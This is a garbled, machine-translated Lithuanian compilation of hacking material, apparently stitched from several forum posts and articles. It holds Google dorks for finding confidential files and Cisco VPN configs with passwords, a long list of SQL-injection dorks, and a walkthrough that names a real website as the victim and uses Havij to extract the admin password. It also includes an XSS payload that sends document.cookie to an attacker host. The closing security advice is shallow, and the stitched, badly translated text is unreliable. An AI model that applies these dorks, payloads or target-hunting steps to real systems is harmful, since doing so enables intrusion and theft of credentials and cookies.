    Jei jums reikia parašyti protingą scenarijų, bus naudinga žinoti, kad dienų seka Google sistemoje nustatoma Julian formatu, naudojant datos diapazono operatorių. Pavyzdžiui, taip galite rasti PDF dokumentų sąrašą su žodžiu konfidencialus, atsisiųstą nuo 2015 m. sausio 1 d. iki liepos 1 d.

    Konfidencialus failo tipas: pdf datos diapazonas: 2457024-2457205

    Diapazonas nurodomas Julijaus datos formatu, neatsižvelgiant į trupmeninę dalį. Išversti juos rankiniu būdu iš Grigaliaus kalendoriaus yra nepatogu. Paprasčiau naudoti datos keitiklį.

    Taikymas ir vėl filtravimas

    Be papildomų operatorių nurodymo paieškos užklausoje, jie gali būti siunčiami tiesiai į nuorodos turinį. Pavyzdžiui, failo tipas:pdf specifikacija atitinka konstrukciją as_filetype=pdf . Dėl to patogu prašyti bet kokių paaiškinimų. Tarkime, rezultatų išvestis tik iš Hondūro Respublikos nurodoma į paieškos URL pridedant konstrukciją cr=countryHN, o tik iš Bobruisko miesto - gcs=Bobruisk. Visą sąrašą galite rasti kūrėjo skiltyje.

    „Google“ automatizavimo įrankiai sukurti taip, kad palengvintų gyvenimą, tačiau jie dažnai sukelia problemų. Pavyzdžiui, vartotojo miestas nustatomas pagal vartotojo IP per WHOIS. Remdamasi šia informacija, Google ne tik subalansuoja apkrovą tarp serverių, bet ir keičia paieškos rezultatus. Priklausomai nuo regiono, pirmajame puslapyje bus rodomi skirtingi tos pačios užklausos rezultatai, o kai kurie iš jų gali būti visiškai paslėpti. Dviejų raidžių kodas po gl=country direktyvos padės pasijusti kosmopolitu ir ieškoti informacijos iš bet kurios šalies. Pavyzdžiui, Nyderlandų kodas yra NL, bet Vatikanas ir Šiaurės Korėja neturi savo kodo Google.

    Dažnai paieškos rezultatai būna netvarkingi net naudojant kelis išplėstinius filtrus. Tokiu atveju užklausą nesunku patikslinti pridedant kelis išimties žodžius (prieš kiekvieną iš jų dedamas minuso ženklas). Pavyzdžiui, bankininkystė, vardai ir pamoka dažnai vartojami su žodžiu Asmeninis. Todėl aiškesni paieškos rezultatai bus rodomi ne pagal vadovėlio užklausos pavyzdį, o pagal patobulintą:

    Pavadinimas: „ /Personal/“ rodyklė – vardai – pamoka – bankininkystė

    Paskutinis pavyzdys

    Įmantrus įsilaužėlis išsiskiria tuo, kad viskuo, ko reikia, aprūpina save pats. Pavyzdžiui, VPN yra patogus dalykas, bet arba brangus, arba laikinas ir su apribojimais. Užsisakyti prenumeratą sau yra per brangu. Gerai, kad yra grupiniai abonementai, o su Google pagalba paprasta tapti grupės dalimi. Norėdami tai padaryti, tiesiog suraskite Cisco VPN konfigūracijos failą, kuris turi gana nestandartinį PCF plėtinį ir atpažįstamą kelią: Program Files\Cisco Systems\VPN Client\Profiles. Vienas prašymas ir tu prisijungi, pavyzdžiui, prie draugiškos Bonos universiteto komandos.

    Failo tipas: pcf vpn ARBA grupė

    INFORMACIJA Google randa konfigūracijos failus su slaptažodžiais, tačiau daugelis jų parašyti šifruota forma arba pakeisti maišais. Jei matote fiksuoto ilgio eilutes, nedelsdami ieškokite iššifravimo paslaugos.

    Slaptažodžiai saugomi šifruoti, tačiau Maurice'as Massardas jau parašė programą jiems iššifruoti ir nemokamai teikia per thecampusgeeks.com.

    „Google“ vykdo šimtus įvairių tipų atakų ir įsiskverbimo testų. Yra daug parinkčių, veikiančių populiarias programas, pagrindinius duomenų bazių formatus, daugybę PHP pažeidžiamumų, debesų ir pan. Tiksliai žinant, ko ieškote, bus daug lengviau rasti reikiamą informaciją (ypač informaciją, kurios neketinote viešinti). „Shodan“ yra ne vienintelis, kuris maitina įdomias idėjas, bet ir kiekviena indeksuotų tinklo išteklių duomenų bazė!

    Taigi, dabar aš jums pasakysiu, kaip ką nors nulaužti be jokių specialių žinių. Iš karto pasakysiu, kad iš to mažai naudos, bet vis tiek.
    Pirmiausia turite rasti pačias svetaines. Norėdami tai padaryti, eikite į google.com ir ieškokite dorks

    Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:straipsnis.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:tema.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

    čia yra mažas sąrašas. Galite naudoti savo. Taigi, mes radome svetainę. Pavyzdžiui, http://www.vestitambov.ru/
    Tada atsisiųskite šią programą

    **Paslėptas turinys: norėdami pamatyti šį paslėptą turinį, jūsų įrašų skaičius turi būti 3 arba didesnis.**

    Spustelėkite Gerai. Tada įterpiame aukos vietą.
    Paspaudžiame startą. Toliau laukiame rezultatų.
    Taigi programa rado SQL pažeidžiamumą.

    Tada atsisiųskite Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= įklijuokite ten gautą nuorodą. Neaiškinsiu, kaip naudoti Havij ir kur jį atsisiųsti; tai nėra sunku rasti. Visi. Gavote reikiamus duomenis – administratoriaus slaptažodį, o tada jau priklauso nuo jūsų fantazijos.

    P.S. Tai mano pirmas bandymas ką nors parašyti. Atsiprašome, jei kažkas negerai

    Nusprendžiau šiek tiek pakalbėti apie informacijos saugumą. Straipsnis bus naudingas pradedantiesiems programuotojams ir tiems, kurie ką tik pradėjo užsiimti „Frontend“ kūrimu. Kokia problema?

    Daugelis pradedančiųjų kūrėjų taip užsiima kodo rašymu, kad visiškai pamiršta apie savo darbo saugumą. Ir, svarbiausia, jie pamiršta apie tokius pažeidžiamumus kaip SQL ir XXS užklausos. Jie taip pat sugalvoja paprastus slaptažodžius savo administracinėms grupėms ir yra veikiami žiaurios jėgos. Kas yra šie išpuoliai ir kaip jų išvengti?

    SQL injekcija

    SQL įterpimas yra labiausiai paplitęs atakos prieš duomenų bazę tipas, vykdomas atliekant SQL užklausą konkrečiai DBVS. Nuo tokių išpuolių kenčia daug žmonių ir net didelių įmonių. Priežastis – kūrėjo klaida rašant duomenų bazę ir, griežtai tariant, SQL užklausos.

    SQL injekcijos ataka galima dėl neteisingo SQL užklausose naudojamų įvesties duomenų apdorojimo. Jei įsilaužėlio ataka bus sėkminga, rizikuojate prarasti ne tik duomenų bazių turinį, bet ir slaptažodžius bei administracinio skydelio žurnalus. Ir šių duomenų visiškai pakaks, kad svetainė būtų visiškai užvaldyta arba negrįžtamai ją pakoreguotų.

    Ataka gali būti sėkmingai atkurta PHP, ASP, Perl ir kitomis kalbomis parašytais scenarijais. Tokių atakų sėkmė labiau priklauso nuo to, kokia DBVS naudojama ir kaip įgyvendinamas pats scenarijus. Pasaulyje yra daug pažeidžiamų svetainių SQL injekcijoms. Tai lengva patikrinti. Tiesiog įveskite „dorks“ – tai specialios užklausos ieškant pažeidžiamų svetainių. Štai keletas iš jų:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:pirkti.php?category=
    • inurl: straipsnis.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:puslapis.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl: straipsnis.php?id=

    Kaip juos panaudoti? Tiesiog įveskite juos „Google“ arba „Yandex“ paieškos sistemoje. Paieškos variklis pateiks ne tik pažeidžiamą svetainę, bet ir puslapį apie šį pažeidžiamumą. Tačiau tuo neapsiribosime ir įsitikinsime, kad puslapis tikrai pažeidžiamas. Norėdami tai padaryti, po reikšmės "id=1" pakanka įdėti vieną kabutę "". Kažkas panašaus į tai:

    • inurl:games.php?id=1'

    Ir svetainė pateiks mums klaidą dėl SQL užklausos. Ko mūsų įsilaužėliui reikia toliau?

    Ir tada jam reikia šios nuorodos į klaidos puslapį. Tada darbas su pažeidžiamumu daugeliu atvejų vyksta „Kali linux“ paskirstyme su šios dalies komunalinėmis priemonėmis: įvedamas įpurškimo kodas ir atliekamos reikiamos operacijos. Kaip tai atsitiks, negaliu jums pasakyti. Bet informacijos apie tai galite rasti internete.

    XSS ataka

    Šio tipo atakos vykdomos prieš slapukų failus. Vartotojai, savo ruožtu, mėgsta juos išsaugoti. Kodėl gi ne? Ką mes darytume be jų? Galų gale, slapukų dėka, mums nereikia šimtą kartų įvesti Vk.com ar Mail.ru slaptažodžio. Ir mažai kas jų atsisako. Tačiau internete įsilaužėliams dažnai atsiranda taisyklė: patogumo koeficientas yra tiesiogiai proporcingas nesaugumo koeficientui.

    Norint įgyvendinti XSS ataką, mūsų įsilaužėliui reikia žinių apie „JavaScript“. Iš pirmo žvilgsnio kalba yra labai paprasta ir nekenksminga, nes ji neturi prieigos prie kompiuterio išteklių. Įsilaužėlis gali dirbti tik su JavaScript naršyklėje, bet to pakanka. Juk svarbiausia įvesti kodą į tinklalapį.

    Detaliau apie puolimo procesą nekalbėsiu. Aš jums papasakosiu tik pagrindus ir prasmę, kaip tai vyksta.

    Įsilaužėlis gali pridėti JS kodą prie kurio nors forumo ar svečių knygos:

    document.location.href ="http://192.168.1.7/sniff.php?test"

    Skriptai nukreips mus į užkrėstą puslapį, kuriame bus vykdomas kodas: ar tai būtų sniffer, ar kokia nors saugykla, ar išnaudojimas, kuris kažkaip pavogs mūsų slapukus iš talpyklos.

    Kodėl JavaScript? Nes JavaScript puikiai tvarko žiniatinklio užklausas ir turi prieigą prie slapukų. Bet jei mūsų scenarijus nuves mus į kokią nors svetainę, vartotojas lengvai tai pastebės. Čia įsilaužėlis naudoja gudresnį variantą – jis tiesiog įveda kodą į paveikslėlį.

    Img=naujas vaizdas();

    Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

    Mes tiesiog sukuriame vaizdą ir priskiriame jam savo scenarijų kaip adresą.

    Kaip nuo viso to apsisaugoti? Tai labai paprasta – nespauskite įtartinų nuorodų.

    DoS ir DDos atakos

    DoS (iš anglų kalbos Denial of Service - paslaugų atsisakymas) yra įsilaužėlių ataka prieš kompiuterinę sistemą, kurios tikslas – sugadinti ją. Taip sukuriamos sąlygos, kurioms esant bona fide sistemos vartotojai negali pasiekti suteiktų sistemos išteklių (serverių), arba ši prieiga yra apsunkinta. Sistemos gedimas taip pat gali būti žingsnis link jos perėmimo, jei kritinėje situacijoje programinė įranga pateikia bet kokią svarbią informaciją: pavyzdžiui, versiją, programos kodo dalį ir pan. Tačiau dažniausiai tai yra ekonominio spaudimo matas: paprastos paslaugos, kuri generuoja pajamas, praradimas. Tiekėjo sąskaitos arba priemonės, skirtos išvengti atakos, smarkiai pataikė į „taikinį“ kišenėje.Šiuo metu DoS ir DDoS atakos yra populiariausios, nes jos leidžia sugesti beveik bet kuriai sistemai nepaliekant teisiškai reikšmingų įrodymų.

    Kuo skiriasi DoS ir DDos ataka?

    DoS yra sumaniai sukurta ataka. Pavyzdžiui, jei serveris netikrina gaunamų paketų teisingumo, įsilaužėlis gali pateikti užklausą, kurios apdorojimas užtruks amžinai, o procesoriui neužteks laiko dirbti su kitais ryšiais. Atitinkamai, klientams bus atsisakyta teikti paslaugas. Tačiau tokiu būdu nebus įmanoma perkrauti ar išjungti didelių gerai žinomų svetainių. Jie yra ginkluoti gana plačiais kanalais ir itin galingais serveriais, kurie gali be jokių problemų susidoroti su tokia perkrova.

    DDoS iš tikrųjų yra ta pati ataka kaip ir DoS. Bet jei DoS yra vienas užklausų paketas, tada DDoS jų gali būti šimtai ar daugiau. Net labai galingi serveriai gali neatlaikyti tokios perkrovos. Pateiksiu pavyzdį.

    DoS ataka yra tada, kai kalbatės su kuo nors, bet tada atsiranda netinkamas žmogus ir pradeda garsiai šaukti. Tai arba neįmanoma, arba labai sunku kalbėti. Sprendimas: iškvieskite apsaugą, kuri nuramins ir pašalins žmogų iš patalpų. DDoS atakos yra tada, kai į vidų atskuba tūkstantinė tokių netinkamo elgesio žmonių minia. Tokiu atveju saugumas negalės visų surišti ir išvežti.

    DoS ir DDoS vykdomi iš kompiuterių, vadinamųjų zombių. Tai kompiuterių įsilaužėlių vartotojų, kurie net neįtaria, kad jų kompiuteris dalyvauja kokio nors serverio atakoje.

    Kaip nuo to apsisaugoti? Apskritai, jokiu būdu. Bet jūs galite apsunkinti įsilaužėlių reikalus. Norėdami tai padaryti, turite pasirinkti gerą prieglobą su galingais serveriais.

    Bruteforce ataka

    Kūrėjas gali sugalvoti daugybę apsaugos nuo atakų sistemų, visapusiškai peržiūrėti mūsų parašytus scenarijus, patikrinti, ar svetainėje nėra spragų ir pan. Tačiau kai jis pasiekia paskutinį svetainės išdėstymo veiksmą, ty kai tiesiog nustato administratoriaus skydelio slaptažodį, jis gali pamiršti vieną dalyką. Slaptažodis!

    Griežtai nerekomenduojama nustatyti paprasto slaptažodžio. Tai gali būti 12345, 1114457, vasya111 ir tt Nerekomenduojama nustatyti trumpesnių nei 10-11 simbolių slaptažodžių. Priešingu atveju jums gali būti taikomas labiausiai paplitęs ir nesudėtingas išpuolis - Brute force.

    Brute force – tai žodyno slaptažodžių paieškos ataka naudojant specialias programas. Žodynai gali būti įvairūs: lotynų, surašymas skaičiais, tarkime, iki tam tikro diapazono, mišrus (lot. + skaičiai), o yra net žodynų su unikaliais simboliais @#4$%&*~~`’”\ ? ir tt

    Žinoma, tokio tipo atakų lengva išvengti, tereikia sugalvoti sudėtingą slaptažodį. Net „captcha“ gali jus išgelbėti. Be to, jei jūsų svetainė sukurta TVS, daugelis iš jų aptinka tokio tipo atakas ir blokuoja IP. Visada turite atsiminti, kad kuo daugiau slaptažodžio simbolių, tuo sunkiau jį atspėti.

    Kaip veikia įsilaužėliai? Daugeliu atvejų jie įtaria arba žino dalį slaptažodžio iš anksto. Gana logiška manyti, kad vartotojo slaptažodis tikrai nebus sudarytas iš 3 ar 5 simbolių. Tokie slaptažodžiai sukelia dažną įsilaužimą. Iš esmės įsilaužėliai paima nuo 5 iki 10 simbolių ir prideda kelis simbolius, kuriuos gali žinoti iš anksto. Toliau generuojami slaptažodžiai su reikiamais diapazonais. „Kali Linux“ distribucija netgi turi programas tokiems atvejams. Ir voila, puolimas nebetruks ilgai, nes žodyno apimtis nebėra tokia didelė. Be to, įsilaužėlis gali panaudoti vaizdo plokštės galią. Kai kurie iš jų palaiko CUDA sistemą, o paieškos greitis padidėja net 10 kartų. Ir dabar matome, kad išpuolis tokiu paprastu būdu yra gana realus. Tačiau tai ne tik svetainės, kurioms taikoma brutali jėga.

    Gerbiami kūrėjai, niekada nepamirškite apie informacijos apsaugos sistemą, nes šiandien daugelis žmonių, įskaitant valstybes, kenčia nuo tokio tipo atakų. Juk didžiausias pažeidžiamumas yra žmogus, kuris visada gali kur nors prasiblaškyti ar ką nors praleisti. Mes esame programuotojai, bet ne programuojamos mašinos. Visada būkite budrūs, nes informacijos praradimas gali turėti rimtų pasekmių!

    Dalintis